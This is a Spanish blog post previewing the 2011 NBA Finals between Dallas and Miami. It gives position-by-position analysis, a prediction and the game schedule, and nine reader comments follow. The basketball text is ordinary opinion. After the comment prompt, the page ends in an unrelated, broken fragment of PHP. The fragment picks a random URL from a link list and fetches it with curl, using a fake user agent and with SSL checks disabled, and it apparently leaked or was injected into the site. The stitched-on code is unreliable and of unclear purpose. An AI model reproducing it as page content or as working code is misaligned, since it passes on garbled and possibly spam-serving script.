Análisis Dallas Mavericks – Miami Heat: La gran final

31 de May de 2011 por TheDeerHunter

Antecedentes

La herida todavía sangra en Dallas.

En Junio del 2006, tras otro excelente curso por encima de las 60 victorias y después de dejar en la cuneta a los San Antonio Spurs, campeones y líderes de la regular, en  segunda ronda parecía que llegaba el momento de los Mavericks. La llegada de Avery Johnson al banquillo le había otorgado el carácter serio que parecía faltar en los tiempos de Don Nelson. Ese punto defensivo que se cree indispensable para alcanzar el anillo. No se apreciaba debilidad alguna.

Por el otro lado del cuadro llegaban los Heat algo tapados. 30 derrotas en la regular ponían en entredicho el último proyecto de Riley. Había rodeado a Wade con Shaq, Alonzo Mourning, Antoine Walker y Eddie Jones, una serie de veteranos ilustres que fracasaron contra los Pistons postanillo. Las incorporaciones ese año de Gary Payton y Jason Williams no lograron más que echar más leña al fuego de la inmediatez y las sensaciones no habían llegado nunca a ser del todo buenas… Hasta esa postemporada, claro, y hasta quitarse de encima el fantasma de los Pistons en la final de conferencia.

El problema no fue el qué sino el cómo. El teórico favoritismo de Nowitzki y los suyos se puso de manifiest ocon dos victorias sencillas en casa. Sin embargo, sin saber muy bien como, cayeron tres derrotas consecutivas en Miami. Especialmente dolorosas fueron la del tercero por dos puntos y la del 5º por tan sólo 1. En el último partido disputado en Dallas se perdió de 3 pero con la sensación de que más de uno había salido derrotado al salto. Esa serie encumbró a Wade y mandó a sus rivales a una dolorosa travesía por el desierto. Hasta hoy. La competición siempre ofrece segundas oportunidades a quien de verdad las busca y este enfrentamiento puede convertirse en una nueva ácida rivalidad.

Esta final es distinta aunque la cara de Wade y la de Nowtizki sean las mismas. El favoritismo se traslada hacia las playas de Florida. Ha sido el año del Big Three, el año de The Decision. El año del imprescindible anillo de LeBron. Pero también es el año que muchos vieron a un loco tatuarse el trofeo de campeones en Dallas a principios de temporada.

Análisis posición vs posición

PG: Se ha regenerado el buen nombre de Jason Kidd, uno de los grandes sin anillo. Será su tercera final a sus 38 añitos recién cumplidos pero el rendimiento de esta “joven” promesa será clave para la victoria. Sus piernas ya no son las que hacían de él un defensor de élite pero su cabeza sí le permite estar entre los dos o tres mejores directores de estos playoffs. A veces nos olvidamos de lo inmensamente bueno que es. No debería hacerlo Spoelstra. 7.7 asistencias y 2.2 robos estos días. La situación le va a permitir dedicarse a lo que sabe, que no será otra cosa que convertirse en el eje de la mejor distribución de balón de la liga, y no necesitará quemarse mucho en sus marcas. Barea, vertiginoso y directo como es, le aporta el contrapunto anotador. Por la otra parte Bibby es otro ilustre sin anillo pero su declive está demasiado marcado. Chalmers tampoco es lo que apuntaba. A pesar de que ambos vienen jugando dignamente hay ventaja para Dallas.

– SG: Dwyane Wade es el mejor escolta de la liga con el permiso de Kobe y en ese sentido no hay discusión que la ventaja es de Miami. Su rendimiento está siendo extraño estos playoffs y aquí no lo va a tener fácil. Defensa pseudo-zonal de Carlisle y un perro de presa como Stevenson. No estamos locos: el especialista de Dallas logró dejar en 2 puntos en 30 minutos a Wade durante su marca en las dos victorias previas de su equipo en la regular. Algunos lo consideran como posible factor X de esta serie… durante los 15 minutitos que pueda vaciarse sobre Wade en cada partido. El resto del tiempo será el #3 de Miami quien tenga que arremangarse sobre Jason Terry. Sabemos qué es lo que ha pasado ante otros buenos defensores como el propio Kobe y Sefolosha antes. Terry es un puñal y si le dejan hará un roto. Wade, con total seguridad, tendrá que ganarse el pan. Mike Miller ha despertado en la final de conferencia. Tocará todas las posiciones exteriores y está llamado a ser factor clave si las circunstancias se lo permiten. Por último los Mavs también disponen de Corey Brewer. Su presencia en este esquema es testimonial pero le sobra nivel para salir algún minuto a morder a Wade.

– SF: ¿Qué pasará si LeBron James no logra inmediatamente el anillo? Una posibilidad que no puede ni contemplarse. King James se ha hecho inevitablemente con las riendas de este equipo. En una posición donde manda “el Rey” la única duda tiene que ser cuánto daño va a causar a sus rivales. Shawn Marion ha cumplido con creces ante otro monstruo como es Durant y le sobran batallas como esta a sus espaldas. El juego de LeBron es muy distinto y veremos como se adapta. La ausencia definitiva de Butler es un contratiempo importante para los tejanos aunque para nada imprevista. Después siempre puede ocurrir que James Jones o Stojakovic tengan unos de esos partidos tontos en el que te hacen un roto. Obviamente, ventaja para Miami.

– PF: Decir Ala-pívot en esta liga es decir Dirk Nowitzki. El alemán confirma año sí y año también que es uno de los más grandes de todos los tiempos. Visto lo visto no quedan muchas dudas de que ahora mismo es el mejor. Delante tiene un rival de entidad como Chris Bosh que viene de comerse nada menos que a Carlos Boozer, pero cuyo carácter ganador sigue siendo sospechoso. Los Heat cuentan con Haslem que ya le amargó la vida a Robin Hood una vez. Ventaja para Dallas porque los recursos de Nowitzki son casi infinitos.

– C: El gran salto cualitativo de los Mavs este año lo personifica Tyson Chandler. Puede culminar un año de ensueño que comenzó con su selección en el Mundial de Turquía, después de haber salido por la puerta de atrás de New Orleans y Charlotte. Su rol específico le ha aportado el equilibrio que le faltaba al equipo. Por si fuera poco Carlisle cuenta detrás suyo con otro hombre grande de calidad como es Haywood, por más que no disfrute de un papel acorde al nivel que mostró en Washington. El pundonor de Joel Anthony no parece suficiente para equiparar el duelo. El papel de Ilgauskas ha ido de más a menos. Ventaja para Dallas.

Claves de la eliminatoria

– Movimiento de balón frente a defensa de líneas: Si los Mavs pueden mover el balón ganarán la serie. Son los mejores en ese arte pero Miami también son los mejores en negarlo con un físico que les permite llegar a todo. No hace falta decir lo doloroso que resulta un contraataque suyo.

– Penetraciones frente a tiros: Sabemos lo que han hecho los Heat defensivamente en el Este, pero es que sorprende que los Mavericks también hayan sido los mejores de su conferencia en este aspecto. Ni unos han encontrado en su camino una amenaza exterior como la que se van a encontrar ahora ni los otros un despliegue físico como éste. Sin embargo ambos cuentan con recursos suficientes como para contrarrestarlo.

– Plantilla vs Individualidades: El debate constante de estos playoffs. Si gana Dallas parecerá que se ha impuesto el colectivo, cuando le sobran individualidades. Si gana Miami da la sensación de que se impone el modelo Big Three, cuando sus hombres de intendencia han resultado vitales en cada una de los cruces.

Pronóstico

Los favoritos son los Miami Heat y éste debería ser su año. Sin embargo, por plantilla, por sus características, por su nivel de juego, por Nowitki, por Kidd, por la revancha, por los antecedentes… este curso yo me inclino por los Dallas Mavericks. Apuesto 2-4 para Dallas.

Calendario

  • Martes 31 de mayo, Miami Heat – Dallas Mavericks
  • Jueves 2 de junio, Miami Heat – Dallas Mavericks
  • Domingo 5 de junio, Dallas Mavericks – Miami Heat
  • Martes 7 de junio, Dallas Mavericks – Miami Heat
  • Jueves 9 de junio, Dallas Mavericks – Miami Heat *
  • Domingo 12 de junio, Miami Heat – Dallas Mavericks *
  • Martes 14 de junio, Miami Heat – Dallas Mavericks *
Comenta

9 comentarios a esta entrada

  1. telekoman dice:
    #1

    Yo me he apostado una cena con mi cuñado a que gana Dallas, así que lo tengo que mantener. Pero me temo que se va a decidir en el séptimo partido. Y evidentemente, si gana Miami, Lebron MVP, si gana Dallas, Dirk MVP. Así que GO DALLAS GO.

    Gran artículo Deer

      Citar

  2. miquel dice:
    #2

    Yo tambien diria un 4-2 para dfallas porque es un equipo no tres tíos,pero, si los suplentes de los heat muestran el mismo nivel que miller-haslem contra miami yo digo 4-3 para miami y lebron mvp

      Citar

  3. HisRoyalAirness dice:
    #3

    Voy a muerte con Dallas. Pero me dan miedo los ùltimos cuartos con los Mavs cansados y Wade y Lebron pletóricos hinchándose a tiros libres…

    IN DIRK WE TRUST

      Citar

  4. jas dice:
    #4

    Seria una gran ilusion para mi q 2 d mis jugadores favoritos se llevaron un anillo, en el caso d kidd me hubiera gustado q se lo llevara con los nets cuando estaba en claro apogeo de su carrera, xo weno creo q seria una bonita guinda para una gran carrera, y en l caso d dirk q decir… pues q es uno de los mejores de la historia simplemente.
    Este año el baloncesto hará justicia a estos dos grandes jugadores. GO DALLAS!!!! 4-1

      Citar

  5. bonaparte dice:
    #5

    Pues por hacer la contra, veo con más fuerza a miami. 4 – 2 miami.

      Citar

  6. Denise dice:
    #6

    4-2 para Miami y el último tren perdido por Nowitzki

      Citar

  7. Joseph Albert23 dice:
    #7

    El mejor analisis que eh leido..
    4-2 para mavericks ..champion 2011 Robin Hood mvp

      Citar

  8. ralage dice:
    #8

    La verdad se me hace díficil ver a Dallas ganando, cuando dependes del tiro , por muy buenos q sean tus tiradores, a la larga… 4-2 Heat

      Citar

  9. GreenPride dice:
    #9

    Pues llegó la gran final. Por el Este un equipo de Miami que parece haber disipado todas las dudas del año y dispuesto a hacerse con ese anillo que pareció que no estarían ni cerca de ganar durante gran parte de la temporada. Ahora tras eliminar a Boston y Chicago con gran solvencia en los finales apretados todo parece haber cambiado y su Big Three parece dispuesto a ganar su primer campeonato e iniciar una posible dinastía. Además tienen el factor cancha a favor por lo que sobre el papel parecen favoritos.
    Enfrente por el Oeste unos Dallas Mavericks con los que casi nadie contaba al iniciarse la Regular Season para llegar a las finales y menos aún barriendo a los Lakers y ganando con gran solvencia a los Thunder en sendas series de playoffs. Nowitzki está jugando los playoffs de su vida (y eso es mucho decir) y todo el equipo parece convencido y dispuesto a acabar con el fantasma que les persigue desde aquellas finales de 2006 ante Miami.
    Las claves de la eliminatoria para mí:
    1) ¿Quien para a LeBron y Wade? LeBron ha estado magnífico repartiendo juego y anotando en los momentos calientes de los playoffs, siendo el claro MVP de su equipo hasta ahora. Marion ha rejuvenecido en estos playoffs y ha jugado más que decentemente contra Durant pero LeBron es más físico y puede darle más problemas. Gran lástima para Dallas no poder contar con Butler para este duelo. Por su parte Wade viene de unas series bastante flojas contra Chicago contra los que no anotó mucho y con malos porcentajes y es difícil pensar que puede hacer otra serie igual de mala. Lo malo para él es que en defensa no se va a poder despistar si no quiere que Terry le haga un traje.
    2) ¿Quien para a Nowitzki y el juego de pases de Dallas? El alemán está fantástico y si los Heat no pueden pararle tendrán que mandar dobles marcajes contra él lo que abrirá el camino a Stevenson, Kidd y sobre todo Terry y Stojakovic para matar con sus triples (que les pregunten a los Lakers). Por tanto será importantísimo ver si Bosh (lo dudo), Haslem o el propio LeBron son capaces de defenderle 1×1 para así poder defender también al resto de jugadores de Dallas
    3) Rebote y pérdidas: Esencial para Dallas ganar estos 2 apartados del juego. En teoría el campo de los rebotes debería ser dominado por los Mavs pero si la diferencia es grande les permitirá más opciones de victoria ya que impedirá las contras demoledoras de los Heat y las pérdidas contra Miami se pagan en puntos de contraataque en contra. Los Heat defienden muy fuerte las líneas de pase y el juego de los Mavs circula mucho el balón así que veremos cuál de los dos impone su ritmo si los pases de Dallas o la presión de los Heat.
    4) Banquillo: El banquillo de los Heat se enfrenta a su prueba de fuego contra el peor enemigo posible. Los Mavs tienen probablemente el banquillo más decisivo de la liga con Barea, Terry, Stojakovic y Haywood más la posibilidad de Brewer. Se antoja necesario que hombres como Haslem y Miller aporten con consistencia para no obligar a jugar muchos minutos al Big Three y que lleguen cansados a los momentos decisivos.
    5) Clutch: LeBron está decidiendo en estos playoffs en los momentos calientes pero enfrente se encuentra a uno de los mejores clutch players en Nowitzki que además cuenta con la sabiduría de Kidd para repartir el juego en los momentos decisivos. Veremos si llegado el momento LeBron mete a Wade en la fiesta en los momentos calientes lo que hace más difícil para a los Heat.
    Una última consideración sería el factor psicológico del recuerdo de aquellas finales de 2006 y el halo perdedor de los Mavs. Si no aparece la psicosis y los Mavs son fuertes mentalmente estas finales con morbo pueden ser largas y decididas por pequeños detalles.
    Para mí difícil pronóstico, muchos nos gustaría que ganara Dallas pero la verdad me cuesta mucho darles ganadores. Para mí será Heat en 6 o 7 pero me gustaría equivocarme.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>